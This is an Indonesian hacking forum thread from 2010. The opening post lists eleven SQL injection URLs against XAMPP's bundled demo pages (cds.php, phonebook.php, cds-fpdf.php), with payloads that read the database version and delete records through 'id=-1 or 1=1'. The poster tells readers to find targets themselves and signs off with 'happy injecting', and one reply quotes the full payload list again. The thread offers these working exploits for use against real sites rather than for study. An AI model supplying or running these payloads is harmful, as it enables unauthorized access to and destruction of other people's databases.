XAMPP Multiple SQL Injection Vuln

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

XAMPP Multiple SQL Injection Vuln

Post by shad.hckr » Sat Jan 30, 2010 5:18 am

Dork : Use Your Brain..

Example :

Code: Select all

http://www.example.com/xampp/cds.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://www.example.com/xampp/cds.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)
http://www.example.com/xampp/cds.php?titel=1&interpret=',1),(version(),1,1)/** (mq off)
http://www.example.com/xampp/phonebook.php?action=del&id=-1%20or%201=1
http://www.example.com/xampp/phonebook.php?lastname=',version())/*&firstname=1 (mq off)
http://www.example.com/xampp/phonebook.php?firstname=',version(),1)/* (mq off)
http://www.example.com/xampp/phonebook.php?firstname=1&phone='),(version(),1,'1 (mq off)
http://www.example.com/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)
http://www.example.com/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://www.example.com/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)
http://www.example.com/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)
happy injecting... wkwkwkwkwk...
ayo di oper... biar terus nyerang ke atas....

aa_ezha
Posts: 66
Joined: Fri May 23, 2008 10:25 pm
Location: Tangerang - Palembang
Contact:

Re: XAMPP Multiple SQL Injection Vuln

Post by aa_ezha » Sat Jan 30, 2010 6:01 am

itu efeknya gmn kk?
FOLLOW THE RULES OR RULES WILL HOLLOW YOU
Image

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: XAMPP Multiple SQL Injection Vuln

Post by shad.hckr » Sun Jan 31, 2010 1:57 pm

duh.. aa ezha merendah nih.. :malumalu:
itu buat ngliat info databasenya aa.. :kaca: :kaca:

d4rkdr34m
Posts: 1
Joined: Tue Jul 28, 2009 10:36 pm

Re: XAMPP Multiple SQL Injection Vuln

Post by d4rkdr34m » Sat Feb 20, 2010 2:45 am

wah , akhirnya tulisan ini publish juga ... ,
siap laksanakan ....

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: XAMPP Multiple SQL Injection Vuln

Post by peniru » Tue Feb 23, 2010 2:03 pm

shad.hckr wrote:Dork : Use Your Brain..

Example :

Code: Select all

http://www.example.com/xampp/cds.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://www.example.com/xampp/cds.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)
http://www.example.com/xampp/cds.php?titel=1&interpret=',1),(version(),1,1)/** (mq off)
http://www.example.com/xampp/phonebook.php?action=del&id=-1%20or%201=1
http://www.example.com/xampp/phonebook.php?lastname=',version())/*&firstname=1 (mq off)
http://www.example.com/xampp/phonebook.php?firstname=',version(),1)/* (mq off)
http://www.example.com/xampp/phonebook.php?firstname=1&phone='),(version(),1,'1 (mq off)
http://www.example.com/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)
http://www.example.com/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://www.example.com/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)
http://www.example.com/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)
happy injecting... wkwkwkwkwk...
ayo di oper... biar terus nyerang ke atas....
:kaca: :kaca: wuihh keren.. tq kk
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

Post Reply

Return to “Web Hacking”